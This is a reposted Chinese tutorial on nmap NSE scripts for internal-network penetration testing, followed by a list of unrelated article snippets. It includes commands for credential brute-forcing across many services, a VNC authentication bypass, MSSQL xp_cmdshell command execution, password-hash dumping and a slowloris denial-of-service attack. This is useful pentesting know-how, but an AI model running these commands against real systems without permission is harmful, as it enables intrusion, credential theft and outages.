nmap脚本使用总结

原文链接:http://drops.wooyun.org/tips/2188

0x00 前言:


nmap的基本介绍和基本使用方法,在乌云知识库中已经有人提交过,讲的比较详细,在此文中就不再讲述。 具体链接:http://drops.wooyun.org/tips/2002

本文主要讲解nmap的众多脚本的使用,在内网渗透的时候尤其好用。

0x01 nmap按脚本分类扫描


nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描:


auth: 负责处理鉴权证书(绕开鉴权)的脚本  
broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务  
brute: 提供暴力破解方式,针对常见的应用如http/snmp等  
default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力  
discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等  
dos: 用于进行拒绝服务攻击  
exploit: 利用已知的漏洞入侵系统  
external: 利用第三方的数据库或资源,例如进行whois解析  
fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽  
malware: 探测目标机是否感染了病毒、开启了后门等信息  
safe: 此类与intrusive相反,属于安全性脚本  
version: 负责增强服务与版本扫描(Version Detection)功能的脚本  
vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067

部分使用截图:

(1) nmap --script=auth 192.168.137.*

负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令

2014060615534754396.jpg

2014060615542724331.jpg

(2)nmap --script=brute 192.168.137.*

提供暴力破解的方式  可对数据库,smb,snmp等进行简单密码的暴力猜解

2014060615563891852.jpg

(3)nmap --script=default 192.168.137.* 或者 nmap -sC 192.168.137.*

默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击

2014060615573246791.jpg

2014060615575272523.jpg

(4)nmap --script=vuln 192.168.137.*

检查是否存在常见漏洞

enter image description here

2014060615591092492.jpg

2014060615595719894.jpg

(5)nmap -n -p445 --script=broadcast 192.168.137.4

在局域网内探查更多服务开启状况

enter image description here

(6)nmap --script external 202.103.243.110

利用第三方的数据库或资源,例如进行whois解析

enter image description here

0x02 nmap按应用服务扫描


(1)vnc扫描:

检查vnc bypass

1

nmap  --script=realvnc-auth-bypass 192.168.137.4 

2014060616053748232.jpg

2014060616051988850.jpg

检查vnc认证方式

nmap  --script=vnc-auth  192.168.137.4 

获取vnc信息

nmap  --script=vnc-info  192.168.137.4 

(2)smb扫描:

smb破解

nmap  --script=smb-brute.nse 192.168.137.4 

smb字典破解

nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4 

enter image description here

smb已知几个严重漏

nmap  --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4   

2014060616100977307.jpg

查看共享目录  

nmap -p 445  --script smb-ls --script-args ‘share=e$,path=\,smbuser=test,smbpass=test’ 192.168.137.4   

查询主机一些敏感信息(注:需要下载nmap_service)

nmap -p 445 -n –script=smb-psexec --script-args= smbuser=test,smbpass=test 192.168.137.4  

enter image description here

查看会话

nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=test,smbpass=test 192.168.137.4   

系统信息

nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test 192.168.137.4 

(3)Mssql扫描:

猜解mssql用户名和密码

nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd 192.168.137.4   

2014060616135770347.jpg

xp_cmdshell 执行命令 

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="net user" 192.168.137.4      

2014060616145120758.jpg

dumphash值

nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa  192.168.137.4     

enter image description here

(4)Mysql扫描:

扫描root空口令

nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4  

enter image description here

列出所有mysql用户

nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.4  

支持同一应用的所有脚本扫描

nmap --script=mysql-* 192.168.137.4 

enter image description here

(5)Oracle扫描:

oracle sid扫描

nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5  

enter image description here

oracle弱口令破解

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=/var/passwd,passdb=/var/passwd 192.168.137.5     

enter image description here

(6)其他一些比较好用的脚本

nmap --script=broadcast-netbios-master-browser 192.168.137.4   发现网关  
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4  破解rsync  
nmap --script informix-brute -p 9088 192.168.137.4    informix数据库破解  
nmap -p 5432 --script pgsql-brute 192.168.137.4       pgsql破解  
nmap -sU --script snmp-brute 192.168.137.4            snmp破解  
nmap -sV --script=telnet-brute 192.168.137.4          telnet破解  
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target>  jboss autopwn  
nmap --script=http-methods.nse 192.168.137.4 检查http方法  
nmap --script http-slowloris --max-parallelism 400 192.168.137.4  dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections  nmap --script=samba-vuln-cve-2012-1182  -p 139 192.168.137.4

(7)不靠谱的脚本:

vnc-brute    次数多了会禁止连接

pcanywhere-brute   同上

2014060616350538005.jpg

0x03  学会脚本分析


nmap中脚本并不难看懂,所以在使用时如果不知道原理可以直接看利用脚本即可,也可以修改其中的某些参数方便自己使用。

举例:

关于oracle的弱口令破解:

调用过程:oracle-brute.nse >> oracle-default-accounts.lst

首先是调用破解脚本:

2014060616383416251.jpg

根据脚本中字典的位置去查看默认字典,当然也可以将破解的字符自行添加其中,或者是修改脚本或参数改变破解字典:

2014060616385857682.jpg

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

转载于:https://www.cnblogs.com/outline/p/nmap.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/289312.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python爬虫实例手机_Python爬虫实现爬取京东手机页面的图片(实例代码)

实例如下所示&#xff1a; __author__ Fred Zhao import requests from bs4 import BeautifulSoup import os from urllib.request import urlretrieve class Picture(): def __init__(self): self.headers {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) Ap…

linux平台安装React Native遇到的坑

3年前我在windows平台安装过React Native,我一直都记忆犹新,那个时候facebook刚推出支持安卓,然后花了一天的时间在自己的window电脑上配置好了,还是很兴奋的,安装博客地址如下 Android之Windows下搭建React Native Android开发环境&#xff08;差不多搞了一天&#xff09; 现…

身份管理软件公司Okta计划IPO,目标融资1亿美元

Okta是一家专门提供身份管理和单点登陆&#xff08;SSO&#xff09;软件的公司。今日公司提交了一份S-1表格正式启动了IPO程序。根据文件内容显示&#xff0c;Okta计划在首次公开募股中融资1亿美元。 公司表示&#xff0c;Okta将在纳斯达克上市&#xff0c;股票代码为OKTA。 即…

jmeter对乱码如何处理_JMeter读取 Excel 表中用例数据实现接口压测

传统的接口测试&#xff0c;都是在接口中手动输入不同用例准备的多种场景参数数据&#xff0c;一遍一遍的输入来执行多个不同的用例&#xff0c;但是现在利用excel表格准备各种类型的数据&#xff0c;使用Jmeter中Jmeter CSV Data Set Config参数化实现可设置的、一次性的读取e…

C# 利用.NET 升级助手将.NET Framework项目升级为.NET 6

概述.NET6 正式版本已经发布有一阵子了&#xff0c;今天我就体验一下如何将.NET Framework的项目升级为.NET 6.升级条件&#xff1a;Windows 操作系统.NET 6 SDKVisual Studio 2022 17.0 或更高版本环境准备①首先是VS2022下载&#xff0c;直接上微软官方网站&#xff0c;下载地…

城市遥感动态监测管理系统

1.系统概述 随着全国各城市数字化进程的发展&#xff0c;高分辨率遥感影像和数字航空影像为“数字城市”的建设提供了丰富的数据源。近年来&#xff0c;遥感影像的空间分辨率和光谱分辨率的明显提高&#xff0c;使得高分辨率遥感影像和数字航空影像的应用得到了极大的延伸。在城…

3月第4周全球域名商TOP15:万网第四 涨幅居亚

IDC评述网&#xff08;idcps.com&#xff09;04月03日报道&#xff1a;据WebHosting.info公布的最新数据显示&#xff0c;在3月第4周&#xff0c;全球域名商域名总量十五强排行榜中&#xff0c;美国占10个席位&#xff0c;成为最大赢家。其次是中国&#xff0c;有3家域名商上榜…

node.js之npm

1 npm介绍 npm是NodeJS一起安装的包管理工具 2 常用命令 1) 安装npm npm install 2) 查看npm版本 npm -v 比如我的ubuntu 6.4.1 3 ) 升级npm npm install npm -g 4) npm安装模块,比如安装react-native 0.56版本 npm install react-native0.56.0 5) npm的全局安装…

python代码加密解密_在python中加密 – 在Javascript中解密

您的Python代码和CryptoJS代码存在许多问题&#xff1a; >您使用随机IV加密Python中的一些明文.如果要检索该明文,则需要在解密期间使用相同的IV.没有IV,明文就无法恢复.通常,IV只是前置于密文,因为它不必是秘密的.因此,您需要在解密期间读取IV,而不是生成新的IV. >您在C…

ftp服务器客户端修改密码,如何在客户端修改FTP密码

一般情况下&#xff0c;FTP空间申请后&#xff0c;用户自己都不清楚如何修改密码&#xff0c;下面给出方法如下&#xff1a;★首先&#xff0c;要确认FTP服务器端允许用户修改秘密。然后运行FlashFXP&#xff0c;在命令栏输入命令“site pswd 旧密码 新密码”如果提示信息“230…

Task.Factory.StartNew 和 Task.Run 到底有什么区别?

前言Task.Factory.StartNew 和 Task.Run 都可以创建 Task:Task.Factory.StartNew(() > { Console.WriteLine("Task.Factory.StartNew"); });Task.Run(() > { Console.WriteLine("Task.Run"); });那它们之间有什么区别呢&#xff1f;实现代码查看这 2…

mvc 职能划分_MVC架构的职责划分原则

来源&#xff1a;https://www.awaimai.com/873.html 歪麦博客最近负责一个项目&#xff0c;用了 Yii Framework 的 MVC 框架&#xff0c;刚开始自以为结构很稳健。但是随着对业务逻辑理解的深入&#xff0c;才开始意识到问题的严重。我错误地理解了 MVC 中的 Controller&…

Matlab clear, clc 和close函数

1、clear 作用:删除工作空间中的项目,释放系统内存 语法:

Highcharts数据表示(3)

Highcharts数据表示(3) 採用对象数组的形式&#xff0c;能够明白节点上每一个项目的值。可是当节点较多时&#xff0c;会造成大量的冗余代码。假设不写配置项名称&#xff0c;对象数组就能够简化二维数组。形式例如以下&#xff1a;data:[[Number|String , Number , Color , Nu…

Git撤销文件的修改(git checkout -- file)(git reset HEAD file)(git reset HEAD~)

1 撤销没有add到暂存储区文件 git checkout -- file 如果我们把文件rm了,git statu肯定会显示出来,我们怎么还原这个文件呢?还是用上面的命令 2 撤销到add到暂存储区文件 分2步 git reset HEAD file 上面命令把暂存区的拉到了工作区,但是这个时候文件依然修改了,我们还…

【Blog.Core开源】框架集成部门权限

&#xff08;Blog.Core框架功能点概述&#xff09;Blog.Core开源四年啦&#xff0c;一行行代码凝结了大家的热情和心血&#xff0c;基本功能骨架已完成&#xff0c;欢迎更多的公司和企业使用哟。真实公司留言盖楼可获得一对一技术指导&#xff1a;https://github.com/anjoy8/Bl…

[一个经典的多线程同步问题]解决方案一:关键段CS

前面提出了一个经典的多线程同步互斥问题&#xff0c;本篇将用关键段CRITICAL_SECTION来尝试解决这个问题。 本文先介绍如何使用关键段&#xff0c;然后再深层次的分析下关键段的实现机制和原理。 关键段CRITICAL_SECTION一共就四个函数&#xff0c;下面说一下这四个函数的原型…

如何设置Matlab输出到Word中图片的大小

方法一:快速型核心方法:设置Word显示比例100%,Matlab的图像大小与屏幕所见的相同;根据Word的排版要求,估计Matlab图像在Word中的大小,进而调整图像大小。具体操作:(以下操作应对图像绘制完成后进行,图像绘制中字体大小、线宽等都与排版需要一致,比如8号字体,需要故意…

服务器线程数一直增加,.NET Core中遇到奇怪的线程死锁问题:内存与线程数不停地增长...

一个 asp.net core 站点&#xff0c;之前运行在Linux 服务器上&#xff0c;运行一段时间后有时站点会挂掉&#xff0c;在日志中记录很多“EMFILE too many open files”的错误&#xff1a;Microsoft.AspNetCore.Server.Kestrel.Internal.Networking.UvException: Error -24 EMF…

python种颜色循环_Python 实现一个颜色色值转换的小工具

需求说明 公司的 UI 设计小哥&#xff0c;已经转用 Zeplin 很久了。Zeplin 的设计稿展示页面的颜色色值使用十进制的 RGB 表示的&#xff0c;在 Android 中的颜色表示大多情况下都需要十六进制的 RGB 表示。我的数学没有好到直接看到十进制就可以心算得到十六进制的结果&#x…